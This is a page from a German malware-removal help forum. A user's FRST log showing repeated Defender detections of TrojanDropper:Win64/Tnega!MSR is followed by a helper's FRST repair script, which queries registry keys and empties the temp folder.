Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


Windows Defender:
===================================
Date: 2021-01-10 00:42:44.1650000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-10 00:40:11.7500000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 18:21:34.8610000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 15:47:12.9890000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 15:27:32.2830000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

CodeIntegrity:
===================================

Date: 2021-01-10 09:04:21.4770000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:21.4740000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.6260000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.6220000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.4900000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.4870000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.4840000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-10 09:04:01.4800000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019
Hauptplatine: FUJITSU FJNBB5C
Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz
Prozentuale Nutzung des RAM: 40%
Installierter physikalischer RAM: 8088.56 MB
Verfügbarer physikalischer RAM: 4825.03 MB
Summe virtueller Speicher: 9368.56 MB
Verfügbarer virtueller Speicher: 6347.04 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.32 GB) (Free:163.87 GB) NTFS

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS
\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         

Alt 10.01.2021, 20:02   #15
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Software"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Software"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Software"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Software"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Software"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Environment"
    cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Software"
    emptytemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________
Logfiles bitte immer in CODE-Tags posten

Thema geschlossen

Themen zu Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR
adobe, antivirus, bonjour, converter, cpu, defender, desktop, explorer, google, internet, internet explorer, mp3, programm, prozesse, realtek, registry, scan, software, svchost.exe, system, temp, trojaner, udp, updates, win64/tnega!msr, windows




Ähnliche Themen: Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR


  1. In Windows 10 TrojanDropper:Win64/Tnega!MSR
    Log-Analyse und Auswertung - 08.01.2021 (39)
  2. Windows 10: mehrere Trojaner- Warnungen (TrojanDropper:Win64/Tnega!MSR)
    Log-Analyse und Auswertung - 02.01.2021 (35)
  3. Windows Defender meldet Trojan:Win32/Occamy.C
    Log-Analyse und Auswertung - 25.05.2019 (17)
  4. Windows Defender meldet Trojaner - Dropper
    Log-Analyse und Auswertung - 29.04.2017 (11)
  5. Windows 10 - Defender meldet mehrere Schadsoftware
    Log-Analyse und Auswertung - 14.04.2017 (13)
  6. Win10 Pro: Programm installiert, danach Chrome Probleme, Windows Defender dauerhaft deaktiviert und beim PC start immer andere Fehlermeldung
    Plagegeister aller Art und deren Bekämpfung - 31.01.2017 (12)
  7. Windows Defender meldet Trojan:DOS/Shetwirl.K
    Log-Analyse und Auswertung - 16.08.2016 (7)
  8. Windows 10/64bit: Windows Defender meldet trojandownloader:win32/esaprof!rfn
    Log-Analyse und Auswertung - 07.04.2016 (21)
  9. Windows 7 Trojaner eingefangen, evtl. Win64/Sathurbot.A, Win32/Kryptik.CMWL, Win64/Sathurbot.A u. a.
    Log-Analyse und Auswertung - 14.10.2014 (15)
  10. Windows 7: Befall von mehreren Trojanern/Viren -Win64/Conedex.B + C + I, Win64/Sirefef.AZ+BJ
    Log-Analyse und Auswertung - 15.02.2014 (86)
  11. Virus/Trojaner: Win64/sirefef.A ; Win64/sirefef.AB ; Win64/sirefef.W ; Auto-Neustart nach 1 Minute
    Plagegeister aller Art und deren Bekämpfung - 13.08.2012 (18)
  12. Win64/Sirefef.AE Trojaner Win64/Agent.BA TrojanerC:\Windows\Installer\{f041020c-58e9-a705-4143-4ddcc
    Plagegeister aller Art und deren Bekämpfung - 25.07.2012 (7)
  13. Windows Defender meldet sich dauernd
    Log-Analyse und Auswertung - 16.05.2010 (2)
  14. Windows Defender meldet Win32/Renos.JS
    Plagegeister aller Art und deren Bekämpfung - 24.10.2009 (5)
  15. Windows Defender meldet: nicht verfügbar
    Log-Analyse und Auswertung - 11.07.2009 (86)
  16. Windows Defender meldet immer wieder : TrojanDownloader:Win32/Renos.DZ
    Plagegeister aller Art und deren Bekämpfung - 02.06.2009 (0)
  17. Windows-Defender meldet Backdoor.win32/Rbot
    Log-Analyse und Auswertung - 15.04.2008 (1)

Zum Thema Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - FRST Log: Code: Alles auswählen Aufklappen ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-01-2021 durchgeführt von ***** (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 15:07:39) Gestartet von - Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR...
Archiv
Du betrachtest: Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.